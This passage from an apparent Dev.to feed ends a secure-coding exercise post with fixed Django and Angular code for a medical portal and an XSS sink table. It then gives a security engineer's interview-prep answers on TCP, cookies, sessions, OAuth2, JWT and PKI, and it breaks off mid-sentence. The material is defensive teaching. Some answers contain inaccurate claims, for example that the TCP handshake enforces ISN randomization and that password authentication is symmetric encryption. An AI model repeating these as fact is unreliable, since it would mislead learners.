class="sh">'</span> <span class="n">user</span> <span class="o">=</span> <span class="n">models</span><span class="p">.</span><span class="nc">OneToOneField</span><span class="p">(</span><span class="n">User</span><span class="p">,</span> <span class="n">on_delete</span><span class="o">=</span><span class="n">models</span><span class="p">.</span><span class="n">CASCADE</span><span class="p">)</span> <span class="n">role</span> <span class="o">=</span> <span class="n">models</span><span class="p">.</span><span class="nc">CharField</span><span class="p">(</span><span class="n">max_length</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span> <span class="n">choices</span><span class="o">=</span><span class="n">Role</span><span class="p">.</span><span class="n">choices</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="n">Role</span><span class="p">.</span><span class="n">STAFF</span><span class="p">)</span> <span class="nd">@receiver</span><span class="p">(</span><span class="n">post_save</span><span class="p">,</span> <span class="n">sender</span><span class="o">=</span><span class="n">User</span><span class="p">)</span> <span class="k">def</span> <span class="nf">create_profile</span><span class="p">(</span><span class="n">sender</span><span class="p">,</span> <span class="n">instance</span><span class="p">,</span> <span class="n">created</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span> <span class="k">if</span> <span class="n">created</span><span class="p">:</span> <span class="n">Profile</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">create</span><span class="p">(</span><span class="n">user</span><span class="o">=</span><span class="n">instance</span><span class="p">)</span> </code></pre> </div> <p><strong><code>medportal/settings.py</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">os</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="nf">load_dotenv</span><span class="p">()</span> <span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">SECRET_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="n">DEBUG</span> <span class="o">=</span> <span class="bp">False</span> <span class="n">ALLOWED_HOSTS</span> <span class="o">=</span> <span class="p">[</span><span class="sh">'</span><span class="s">medportal.com</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">secondportal.com</span><span class="sh">'</span><span class="p">]</span> <span class="n">MIDDLEWARE</span> <span class="o">=</span> <span class="p">[</span> <span class="sh">'</span><span class="s">django.middleware.security.SecurityMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.sessions.middleware.SessionMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.middleware.common.CommonMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.middleware.clickjacking.XFrameOptionsMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.middleware.csrf.CsrfViewMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.auth.middleware.AuthenticationMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">django.contrib.messages.middleware.MessageMiddleware</span><span class="sh">'</span><span class="p">,</span> <span class="p">]</span> <span class="n">SECURE_SSL_REDIRECT</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">SECURE_HSTS_SECONDS</span> <span class="o">=</span> <span class="mi">31536000</span> <span class="n">SECURE_HSTS_INCLUDE_SUBDOMAINS</span> <span class="o">=</span> <span class="bp">True</span> <span class="n">SECURE_HSTS_PRELOAD</span> <span class="o">=</span> <span class="bp">True</span> </code></pre> </div> <p><strong><code>portal/views.py</code> — Fixed (key excerpts)</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@csrf_protect</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_patient</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">patient_id</span><span class="p">):</span> <span class="n">cookie_value</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">COOKIES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">session</span><span class="sh">'</span><span class="p">)</span> <span class="n">session_data</span> <span class="o">=</span> <span class="nf">verify_session_cookie</span><span class="p">(</span><span class="n">cookie_value</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">session_data</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">Invalid Credentials</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">if</span> <span class="n">session_data</span><span class="p">[</span><span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="p">].</span><span class="nf">lower</span><span class="p">()</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">[</span><span class="sh">'</span><span class="s">doctor</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">admin</span><span class="sh">'</span><span class="p">]:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">Not Authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT id, full_name, date_of_birth, diagnosis, assigned_doctor_id FROM portal_patient WHERE id = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">patient_id</span><span class="p">,)</span> <span class="p">)</span> <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">row</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not found</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">404</span><span class="p">)</span> <span class="n">assigned_doctor</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="k">if</span> <span class="n">session_data</span><span class="p">[</span><span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="p">].</span><span class="nf">lower</span><span class="p">()</span> <span class="o">==</span> <span class="sh">'</span><span class="s">doctor</span><span class="sh">'</span> <span class="ow">and</span> <span class="n">assigned_doctor</span> <span class="o">!=</span> <span class="n">session_data</span><span class="p">[</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">]:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">Not Authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sh">'</span><span class="s">name</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="sh">'</span><span class="s">dob</span><span class="sh">'</span><span class="p">:</span> <span class="nf">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]),</span> <span class="sh">'</span><span class="s">diagnosis</span><span class="sh">'</span><span class="p">:</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]})</span> <span class="nd">@csrf_protect</span> <span class="nd">@ratelimit</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">,</span> <span class="n">rate</span><span class="o">=</span><span class="sh">'</span><span class="s">5/m</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">download_lab_result</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">cookie_value</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">COOKIES</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">session</span><span class="sh">'</span><span class="p">)</span> <span class="n">session_data</span> <span class="o">=</span> <span class="nf">verify_session_cookie</span><span class="p">(</span><span class="n">cookie_value</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">session_data</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">Invalid Credentials</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">401</span><span class="p">)</span> <span class="k">if</span> <span class="n">session_data</span><span class="p">[</span><span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="p">].</span><span class="nf">lower</span><span class="p">()</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">[</span><span class="sh">'</span><span class="s">doctor</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">admin</span><span class="sh">'</span><span class="p">]:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">Not Authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="k">with</span> <span class="n">connection</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">as</span> <span class="n">cursor</span><span class="p">:</span> <span class="n">filename</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">file</span><span class="sh">'</span><span class="p">,</span> <span class="sh">''</span><span class="p">)</span> <span class="n">base_dir</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="sh">'</span><span class="s">/var/lab_results</span><span class="sh">'</span><span class="p">)</span> <span class="n">pwd_file</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">base_dir</span><span class="p">,</span> <span class="n">filename</span><span class="p">))</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">pwd_file</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="n">base_dir</span> <span class="o">+</span> <span class="n">os</span><span class="p">.</span><span class="n">sep</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">Invalid filepath.</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">404</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT patient_id, filename FROM portal_labresult WHERE filename = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">filename</span><span class="p">,)</span> <span class="p">)</span> <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">row</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not found</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">404</span><span class="p">)</span> <span class="n">patient_id</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT assigned_doctor_id FROM portal_patient WHERE id = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">patient_id</span><span class="p">,)</span> <span class="p">)</span> <span class="n">doctor_row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">doctor_row</span><span class="p">:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">not found</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">404</span><span class="p">)</span> <span class="n">assigned_doctor</span> <span class="o">=</span> <span class="n">doctor_row</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">if</span> <span class="n">session_data</span><span class="p">[</span><span class="sh">'</span><span class="s">role</span><span class="sh">'</span><span class="p">].</span><span class="nf">lower</span><span class="p">()</span> <span class="o">==</span> <span class="sh">'</span><span class="s">doctor</span><span class="sh">'</span> <span class="ow">and</span> <span class="n">assigned_doctor</span> <span class="o">!=</span> <span class="n">session_data</span><span class="p">[</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">]:</span> <span class="k">return</span> <span class="nc">JsonResponse</span><span class="p">({</span><span class="sh">'</span><span class="s">error</span><span class="sh">'</span><span class="p">:</span> <span class="sh">'</span><span class="s">Not Authorized</span><span class="sh">'</span><span class="p">},</span> <span class="n">status</span><span class="o">=</span><span class="mi">403</span><span class="p">)</span> <span class="k">return</span> <span class="nc">FileResponse</span><span class="p">(</span><span class="nf">open</span><span class="p">(</span><span class="n">pwd_file</span><span class="p">,</span> <span class="sh">'</span><span class="s">rb</span><span class="sh">'</span><span class="p">))</span> </code></pre> </div> <p><strong><code>src/app/patient-search.component.ts</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// [innerHTML] replaced with {{ }} interpolation throughout</span> <span class="c1">// bypassSecurityTrustHtml removed entirely</span> <span class="c1">// SafeHtml type replaced with plain string</span> <span class="k">export</span> <span class="kd">class</span> <span class="nc">PatientSearchComponent</span> <span class="p">{</span> <span class="nx">query</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nx">searchResults</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nl">patients</span><span class="p">:</span> <span class="kr">any</span><span class="p">[]</span> <span class="o">=</span> <span class="p">[];</span> <span class="nx">guidelinesContent</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nx">exportOutput</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nf">search</span><span class="p">()</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s2">`/api/patients/search/?q=</span><span class="p">${</span><span class="k">this</span><span class="p">.</span><span class="nx">query</span><span class="p">}</span><span class="s2">`</span><span class="p">,</span> <span class="p">{</span> <span class="na">responseType</span><span class="p">:</span> <span class="dl">'</span><span class="s1">text</span><span class="dl">'</span> <span class="p">})</span> <span class="p">.</span><span class="nf">subscribe</span><span class="p">(</span><span class="nx">resp</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">searchResults</span> <span class="o">=</span> <span class="nx">resp</span><span class="p">;</span> <span class="p">});</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h2> What You Learned </h2> <p>After seven exercises across FastAPI, Flask, and Django backends paired with React, Vue.js, Alpine.js, Next.js, Nuxt.js, and Angular frontends — here is the pattern that runs through every single vulnerability:</p> <p><strong>Every bug is a trust boundary violation.</strong> SQL injection trusts user input in a query. IDOR trusts a client-supplied ID without verifying ownership. SSRF trusts a URL without validating the destination. Path traversal trusts a filename without verifying the path stays inside its directory. The fix is always the same question: <em>at which layer does the server establish trust, and is that layer actually enforced?</em></p> <p>The XSS sink table is worth memorizing:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Framework</th> <th>Unsafe</th> <th>Safe</th> </tr> </thead> <tbody> <tr> <td>React</td> <td><code>dangerouslySetInnerHTML</code></td> <td><code>{variable}</code></td> </tr> <tr> <td>Vue.js</td> <td><code>v-html</code></td> <td> <code>v-text</code> / <code>{{ }}</code> </td> </tr> <tr> <td>Alpine.js</td> <td><code>x-html</code></td> <td><code>x-text</code></td> </tr> <tr> <td>Next.js</td> <td><code>dangerouslySetInnerHTML</code></td> <td><code>{variable}</code></td> </tr> <tr> <td>Nuxt.js</td> <td><code>v-html</code></td> <td> <code>v-text</code> / <code>{{ }}</code> </td> </tr> <tr> <td>Angular</td> <td> <code>[innerHTML]</code> / <code>bypassSecurityTrustHtml()</code> </td> <td><code>{{ }}</code></td> </tr> </tbody> </table></div> <p>Every frontend framework has exactly one escape hatch that bypasses auto-escaping. That escape hatch is always the XSS sink.</p> <h2> Take the Challenge </h2> <p>All exercises are available in the open source repository:</p> <p>⭐ <strong><a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">github.com/fosres/SecEng-Exercises</a></strong></p> <p>Found a bug I missed? Disagree with a fix? Drop it in the comments. The best security engineers argue about this stuff.</p> <p><em>What vulnerability class trips you up most often?</em> → <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Vote here</a></p> <p><em>Written by Tanveer Salim — Security Engineer in training, Intel IPAS alumni, 553+ threat models documented. Follow on Dev.to: <a href="https://dev.to/fosres">@fosres</a></em></p> security python webdev appsec fosres Wed, 25 Mar 2026 19:37:13 +0000 https://dev.to/fosres/security-engineering-phone-screen-10-questions-you-must-answer-fluently-52fp https://dev.to/fosres/security-engineering-phone-screen-10-questions-you-must-answer-fluently-52fp <blockquote> <p><strong>Series note:</strong> This post is Part 1 of my Security Engineering Interview Prep series. I am working through <a href="https://secengweekly.substack.com/p/if-i-were-starting-over-as-a-security" rel="noopener noreferrer">Saed Farah's "If I Were Starting Over as a Security Engineer in 2026"</a> question bank — 94 questions mapped to a structured curriculum — and archiving my personal answers here as I lock each one in.</p> <p>These are the answers I would give in a real phone screen. I am targeting mid-level Security Engineering roles at companies like Anthropic, GitLab, Stripe, Coinbase, Trail of Bits, and NCC Group.</p> </blockquote> <h2> Why Phone Screen Answers Belong in a Blog </h2> <p>The following ten questions appear in Security Engineering phone interviews. They come from <strong>Section A: Encryption, Authentication &amp; Access</strong> of Saed Farah's question bank, and nine of the ten are flagged ★ <strong>INDISPENSABLE</strong> — meaning they appear frequently enough across mid-level Security Engineering screens that a weak answer on any of them is a disqualifying signal.</p> <p>Interview prep that stays in a notebook rots. Writing answers in public forces you to be precise. Vague mental models collapse under the pressure of an interviewer's follow-up. Clear writing is the test.</p> <p>Let's get into it.</p> <h2> Q1 — What is a Three-Way Handshake? </h2> <p>This is the technique used in TCP/IP connections to verify<br> sender and recipient of messages can communicate with each other.</p> <p>Below is a quick summary of the handshake:</p> <ol> <li><p>Sender sends an SYN packet to recipient</p></li> <li><p>Recipient replies back with a SYN-ACK packet to sender</p></li> <li><p>Sender replies back with an ACK packet</p></li> </ol> <p>It is possible an attacker can trick either party into believing<br> they are the authentic recpient of said party's messages: an<br> attack known as a TCP Session Hijacking Attack.</p> <p>To prevent this the TCP 3-way handshake enforces Initial Sequence<br> Number Randomization. Now that said party is sending a random number<br> it is hard for the attacker to predict what the future ISN will<br> be in said party's future packets--mitigating the attack.</p> <p>Without doing the TCP 3-way handshake an attacker<br> can next attempt a Denial of Service by sending excessive SYN packets<br> --depleting the other party of system resources.</p> <blockquote> <p><strong>Curriculum anchor:</strong> Week 1–2 TCP/IP fundamentals. ★ Indispensable.</p> </blockquote> <h2> Q2 — How Do Cookies Work? </h2> <p>Let me first start with the rationale behind cookies.</p> <p>In the modern world the user must make an effort to prove their<br> identity to a service. This can be done by entering a (sufficiently<br> complex) password, or a passkey, or biometric credentials. Users<br> frequently close sessions to work on something else only to come back<br> to the service after a brief period of time. It would annoy the user<br> to have to exert manual effort to prove their identity to a web<br> service! Had that been the case critical business models such as<br> Software as a Service may not have been as profitable as they are<br> today.</p> <p>To make the user's life easier web security developers introduced<br> the Cookie system. After the user proves their identity through<br> manual effort the first time (such as by using one of the techniques<br> discussed previously) -- the web service passes on a Cookie which<br> contains secret information unique to said user. Whenever the user<br> revisits the web service the user's browser automatically sends the<br> cookie to the web service for authentication. If the secret information<br> is verified to be correct the user's identity is verified.</p> <p>Throughout history web developers faced issues with attackers stealing<br> Cookies or even tricking users to submitting cookies to the web<br> service without their knowledge. Several security defenses to protect<br> cookies from theft or unwitting submission have been invented such<br> as the HttpOnly flag (forbids Javascript from accessing the Cookie),<br> the Secure flag (which only allows the cookie to be submitted upon<br> the browser being able to establish a valid HTTPS connection to the<br> target website), and the SameSite flag (which restricts the ability<br> of a cookie to be sent in cross-site requests), Expires flag (which<br> sets expiration date of cookie)--a good habit to set expiration<br> to minimize risk of cookie theft, Domain, and Path flags (to<br> restrict to which webistes and endpoints the browser is allowed<br> to send cookies too).</p> <p>Web developers must take care to verify the secret information<br> received from cookies matches what is expected. They must also<br> be sure to set the proper security flags to avoid mismanagement<br> of the cookie. Finally Web Developers must be careful not to<br> allow the attacker to steal any secrets stored within the Cookie.<br> For instance if a Cookie stores a CSPRNG-generated string the<br> web server should NOT also store the string--only a cryptographically<br> secure message digest. This--and using a constant-time comparision<br> string function to compare message digest--are appropriate precautions<br> to prevent an attacker from stealing the Cookie secret.</p> <blockquote> <p><strong>Curriculum anchor:</strong> Week 6 — session management and secure cookie flags. ★ Indispensable.</p> </blockquote> <h2> Q3 — How Do Sessions Work? </h2> <p>HTTP requests are not persistent--they do not keep track of the<br> state of previous HTTP requests/replies. This is a downside for<br> users using a web-service: a person that has logged into a web service<br> would ideally want the web service to remember they are the true<br> identity as the user and that they are authorized to access/interact<br> with certain resources on the web service. Web developers had<br> to figure out a way to allow this beyond sending simple HTTP requests.</p> <p>This gave birth to two important techniques for establishing and<br> verifying user sessions: User session cookie management and<br> verifying Anti-CSRF tokens. Both of these techniques require the<br> user to receive and store credentials that the web service verifies<br> upon the user revisiting the web service within the expiration<br> time window. This allows the web service to automatically verify<br> the identity of the user to access certain resources from the web<br> service. Precautions have been made to prevent attackers from<br> corrupting user sessions (see previous explanations above). Anti-CSRF<br> tokens prevent an attacker from tricking users into performing actions<br> on a cross-site that said user has a valid cookie for.</p> <p>Upon logout session credentials are marked as invalid. Upon expiration<br> session credentials must be rejected by the web server.</p> <blockquote> <p><strong>Curriculum anchor:</strong> Week 6 — session management. See also: <em>Full Stack Python Security</em>, Chapter 3.</p> </blockquote> <h2> Q4 — Explain How OAuth2 Works </h2> <p>OAuth is a framework that allows a third-party service (called a<br> client in OAuth2) to access a protected resource on behalf of a<br> resource owner (the human user).</p> <p>Here are the steps on the most important version of OAuth2, the<br> authorization grant, works. My information is taken from<br> "OAuth2 in Action" -- page 23. <sup id="fnref1">1</sup></p> <ol> <li><p>It is ideal if the client<br> generates a <code>code_verifier</code> for Proof-Key for Code Exchange. This<br> is a CSPRNG-generated secret. The client then can either send<br> the <code>code_verifier</code> to the Authorization Server or ideally<br> send the cryptographic message digest of the <code>code_verifier</code><br> to the Authorization Server. In either case what the Authorization<br> Server receives is called the <code>code_challenge</code>. Proof-Key for Code<br> Exchange prevents a MITM attacker that has stolen the<br> authorization code from receiving an access token from the<br> Authorization server's token endpoint. Although ideal not<br> required in OAuth2. The <code>code_challenge</code> can be the <code>code_verifier</code><br> itself but ideally the cryptographic message digest of the<br> <code>code_verifier</code>. Having the Authorization Server's token endpoint<br> store the hash, instead of the actual <code>code_verifier</code> protects the<br> <code>code_verifier</code> from theft if an attacker compromises the<br> Authorization Server's token endpoint.</p></li> <li><p>The third-party service, called the client, redirects the resource<br> owner, or user, to the authorization endpoint. There, the user must<br> prove their identity using traditional authentication.</p></li> <li><p>The resource owner is given the option to authorize the client.<br> The user manually approves.</p></li> <li><p>The authorization server now redirects resource owner back<br> to client with authorization code.</p></li> <li><p>Client authenticates by sending client credentials, authorization<br> code, and ideally also the Proof-Key for Code Exchange <code>code_verifier</code><br> to the Authorization Server's token endpoint.</p></li> <li><p>Authorization server sends access token to client. Ideally<br> the authorization server also sends a refresh token the client<br> can use to get a new access token should the current access token<br> expire.</p></li> <li><p>Client accesses the protected resource after sending the access token.</p></li> </ol> <blockquote> <p><strong>Source:</strong> <em>OAuth 2 in Action</em> (Justin Richer &amp; Antonio Sanso), p. 23. <sup id="fnref1">1</sup></p> <p><strong>Curriculum anchor:</strong> Week 12 — SSO + OAuth2 + JWT. ★ Indispensable.</p> </blockquote> <h2> Q5 — Explain How JWTs Work </h2> <p>The following answer is straight from:</p> <p><a href="https://www.jwt.io/introduction#what-is-json-web-token" rel="noopener noreferrer">https://www.jwt.io/introduction#what-is-json-web-token</a> <sup id="fnref2">2</sup></p> <p>JWT Tokens are a compact and self-contained technique to transmit<br> secret information between client and server. The recipient of the<br> token can verify the authenticity of the message since the JWT Token<br> is signed.</p> <p>There are two uses of JWTs:</p> <ol> <li><p>Authorization: After the user manually authenticates themselves and<br> proves their identity the user is assigned a JWT Token. From that point<br> on for every endpoint the user accesses the server verifies the user's<br> identity by verifying the user's JWT Token. Developers must be<br> careful the JWT Token is not stolen--such as from an XSS exploit.</p></li> <li><p>Secure Information Exchange: JWT Tokens are also used in the<br> private transfer of information. The secrecy of the JWT Token content<br> is protected under TLS. The authenticity of the JWT Token is protected<br> by HMAC or digital signature (using a private-public key pair).</p></li> </ol> <p>There are three components to a JWT Token:</p> <ol> <li><p>Header: Usually explains the type of token and the digital<br> signature algorithm being used.</p></li> <li><p>Payload: This is the main content of the JWT Token--compromised<br> of claims.</p></li> <li><p>Signature: This is either the HMAC or digital signature that<br> recipients can verify upon recieving the message. A valid verification<br> implies the message was not tampered and was sent by the claimed<br> sender.</p></li> </ol> <blockquote> <p><strong>Source:</strong> <a href="https://jwt.io/introduction" rel="noopener noreferrer">jwt.io — Introduction to JSON Web Tokens</a>. <sup id="fnref2">2</sup></p> <p><strong>Curriculum anchor:</strong> Week 6 — API auth patterns. ★ Indispensable.</p> </blockquote> <h2> Q6 — What Is a PKI Flow? How Would You Diagram It? </h2> <p>PKI flow maps the chain-of-trust from Root Certificate Authority<br> to the TLS Certificate owned by a web service. The idea is all<br> the digital signatures of the certificates belonging to each of<br> these services must be verified by clients as valid before the<br> client (or user's browser) accepts the TLS certificate of the<br> web service as valid. This is a prerequisite that must be done<br> before the client establishes a secure HTTPS connection with<br> a web server.</p> <p>The diagram of the flow of verification--showing the order at<br> which TLS Certificates are verified--are shown below:</p> <p>Root Certificate validated--&gt;Intermediate Certificates validated<br> --&gt;Web Server TLS Certificate validated</p> <p>There is a point to the existence of the Root Certificate.<br> Every browser comes with it a set of publicly known Root TLS<br> Certificates--so a self-signed Root TLS Certificate is sufficient<br> to verify that a Root TLS Certificate is valid. The Root Certificate<br> can be thought of as a Root of Trust for this reason. If Root<br> TLS Certificates are publicly acknowledged why do we have Intermediate<br> TLS Certificates. In case a Root Certificate is compromised it would<br> be costly to replace the original Root Certificate with a brand new<br> one. An Intermediate Certificate Authority will be much more quickly<br> be able to replace an invalid/stolen TLS Certificate than a Root<br> Certificate. The Intermediate Certificate Authority signs the TLS<br> Certificate of the web service the client is interested in visiting.</p> <p>A self-signed TLS certificate for a web service means nothing--anyone<br> can make one--but only the real web service should be able to convince<br> an Intermediate TLS Certificate to sign the web service's TLS<br> Certificate. This is not to say it is impossible for Intermediate<br> Certificate Authorities to mis-issue TLS Certificates. To this day<br> it is a problem. The best mitigation of that is DNSSEC and DANE.</p> <p>Although those two techniques are best practice the industry<br> has decided to settle with Certificate Transparency. These are<br> unmodifiable--append only logs of issued TLS Certificates that<br> site owners can check to see if a TLS Certificate has been mis-issued<br> for their site. Although Certificate Transparency is an industry<br> standard--it does NOT prevent mississuance of TLS Certificates.</p> <p>To prevent mis-issuance the Certificate Authority Authorization<br> field in DNS records has been introduced whitelisting which<br> Certificate Authorities are authorized to issue TLS Certificates.</p> <p>Still even this does not prevent the mis-issuance of TLS Certificates.<br> The best defenses to prevent mis-issuance are still DNSSEC and<br> DANE--despite low adoption.</p> <p>To avoid the risk of theft of TLS Certificate--web services are<br> encouraged to replace their TLS Certificates periodically--from as<br> little as 3 months to no more than a year of time.</p> <blockquote> <p><strong>Curriculum anchor:</strong> Week 5 — cryptography basics + asymmetric key infrastructure.</p> </blockquote> <h2> Q7 — Describe the Difference Between Symmetric and Asymmetric Encryption </h2> <p>Symmetric-Key Cryptography uses the same key to encrypt/decrypt<br> information. This is the encrypion featured in password authentication,<br> encrypting of documents, generating HMACs, and more. Symmetric-Key<br> Cryptography--when using a sufficiently long and CSPRNG-generated<br> key--is thought to be resistant to attack by a quantum supercomputer.</p> <p>Asymmmetric Encryption: In this encryption one 